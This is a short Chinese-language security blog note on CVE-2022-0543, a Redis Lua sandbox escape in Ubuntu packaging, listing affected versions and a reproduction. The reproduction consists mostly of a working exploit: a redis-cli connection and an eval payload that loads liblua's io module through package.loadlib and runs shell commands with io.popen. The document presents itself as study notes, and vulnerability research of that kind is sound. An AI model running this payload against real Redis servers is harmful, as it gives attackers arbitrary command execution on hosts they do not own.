Redis Lua沙盒绕过命令执行(CVE-2022-0543)

Redis Lua沙盒绕过命令执行(CVE-2022-0543)

漏洞原理

在 Ubuntu 发行版打包中,不慎在 Lua 沙箱中重新分发一个箱对象package,攻击利用这个对象的加载动态库,可以使用package.loadlib从 liblua 加载模块,然后使用此模块执行任意命令;

影响版本

2.2 <= redis < 5.0.13
2.2 <= redis < 6.0.15
2.2 <= redis < 6.2.5

漏洞复现

登录redis客户端

./redis-cli -h ip -p 6379

执行脚本:

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

在这里插入图片描述
成功!

参考:

https://blog.csdn.net/jd_cx/article/details/125422496

免责声明:
本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值